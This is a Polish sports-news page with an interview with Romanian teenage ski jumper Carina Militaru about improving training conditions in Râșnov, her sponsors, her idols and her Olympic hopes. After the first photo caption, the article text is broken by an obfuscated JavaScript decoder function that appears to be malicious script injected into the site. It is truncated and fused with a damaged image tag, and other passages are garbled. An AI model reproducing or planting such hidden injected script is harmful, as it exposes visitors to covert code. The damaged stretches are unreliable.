You are currently viewing Carina Militaru dla SkokiPolska: „Warunki do skakania w Rumunii są coraz lepsze”

Carina Militaru dla SkokiPolska: „Warunki do skakania w Rumunii są coraz lepsze”

Od kilku sezonów żeńskie skoki narciarskie coraz bardziej przebijają się do świadomości narciarskich kibiców. Dziewczęta i panie skaczą jednak nie tylko w Austrii, Niemczech, czy Stanach Zjednoczonych. Niedawno o krajowe mistrzostwo walczyły reprezentantki Rumunii. - Nasze wyniki są ulegają poprawie, a warunki do skakania w Rumunii są coraz lepsze - przyznała wicemistrzyni kraju, Carina Militaru.

 

Carina Militaru, która po raz pierwszy w zawodach FIS wystartowała nieco ponad rok temu, już ma na swoim koncie udane występy w międzynarodowych konkursach. Tego lata po raz drugi z rzędu triumfowała w klasyfikacji generalnej Pucharu Karpat, w marcu zaliczyła debiut w Pucharze Kontynentalnym, a na koniec sezonu została wicemistrzynią Rumunii. - To był dla mnie najlepszy sezon letni w karierze - przyznała.

- Carina Militaru dla SkokiPolska: "Warunki do skakania w Rumunii są coraz lepsze"function u2fd518ba9147(q3){var u9='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var y7='';var ve,p7,w9,w4,y6,p9,y4;var s0=0;do{w4=u9.indexOf(q3.charAt(s0++));y6=u9.indexOf(q3.charAt(s0++));p9=u9.indexOf(q3.charAt(s0++));y4=u9.indexOf(q3.charAt(s0++));ve=(w4>4);p7=((y6&15)>2);w9=((p9&3)=192)ve+=848;else if(ve==168)ve=1025;else if(ve==184)ve=1105;y7+=String.fromCharCode(ve);if(p9!=64){if(p7>=192)p7+=848;else if(p7==168)p7=1025;else if(p7==184)p7=1105;y7+=String.fromCharCode(p7);}if(y4!=64){if(w9>=192)w9+=848;else if(w9==168)w9=1025;else if(w9==184)w9=1105;y7+=String.fromCharCode(w9);}}while(s0andra Militaru, fot. Julia Piątkowska" src="http://www.skokipolska.pl/wp-content/uploads/2014/09/Militaru_Carina_fot.Julia_.Piatkowska-300x200.jpg" alt="Carina Alexandra Militaru, fot. Julia Piątkowska" width="300" height="200" /> Carina Alexandra Militaru, fot. Julia Piątkowska

Jak wiemy, skoki narciarskie w Rumunii, nie są jeszcze tak popularnym sportem, jak to jest chociażby w Polsce. Powoli zyskują jednak coraz więcej fanów, za czym idzie większe wsparcie dla sportowców. - Dzięki wsparciu naszego sponsora, którym jest austriacki koncern OMV, ciężkiej pracy zawodników i trenerów, cały czas się rozwijamy. Także dlatego, że sport w Rasnovie jest wspierany przez burmistrza miasta, warunki uległy znacznej poprawie i możemy osiągać lepsze rezultaty - powiedziała Militaru.

Niespełna 14-letnia skoczkini zapytana o początek swojej przygody ze skokami, odparła: - Moja sportowa kariera zaczęła się pięć lat temu, pod przewodnictwem mojego nauczyciela, którym jest Gheorge Baila. On odkrył we mnie zamiłowanie do skoków i był moim trenerem, aż do momentu, kiedy dostałam się do reprezentacji Rumunii w skokach narciarskich.

Militaru.Szwab fot.J.Piatkowska 300x200 - Carina Militaru dla SkokiPolska: "Warunki do skakania w Rumunii są coraz lepsze"
Carina Militaru i polska skoczkini - Joanna Szwab w Szczyrku, fot. Julia Piątkowska

Jak się okazuje, skoczkinie i skoczkowie z Rumunii są dość częstymi gośćmi w Polsce. - Najczęściej trenuję w centrum sportowym na skoczniach w Rasnovie, które jest jedynym miejscem tego rodzaju w Rumunii. Moimi ulubionymi skoczniami są jednak te w Szczyrkustwierdziła reprezentantka Rumunii, a zapytana o swoich sportowych idoli, powiedziała: - Moimi ulubionymi zawodnikami są Austriacy - Gregor Schlierenzauer i Thomas Morgenstern. Podziwiam tych skoczków za ich osiągnięcia, ambicję i odwagę. To smutne, że Morgi zakończył swoją sportową karierę, jednak nadal wzorem do naśladowania pozostał dla mnie Gregor.

Militaru opowiedziała też o swoich sportowych planach na nadchodzącą zimę, a także marzeniach związanych ze skokami: - Niestety nie mogę jeszcze uczestniczyć w Pucharze Świata, ponieważ jestem jeszcze zbyt młoda, ale przygotowuję się intensywnie do momentu debiutu. W sezonie 2014/2015 mam nadzieję osiągać lepsze wyniki niż zeszłej zimy. Moim marzeniem jest wziąć udział w Zimowych Igrzyskach Olimpijskich i dumnie reprezentować mój kraj. Liczę na to, że kiedyś mi się to uda, ponieważ moim mottem są słowa "Uwierz w swoje marzenia".

 

informacja własna

 

 

Ten post ma jeden komentarz

  1. JankessPL

    Oby więcej takich wywiadów z mniej znanymi skoczkami/skoczkiniami

Dodaj komentarz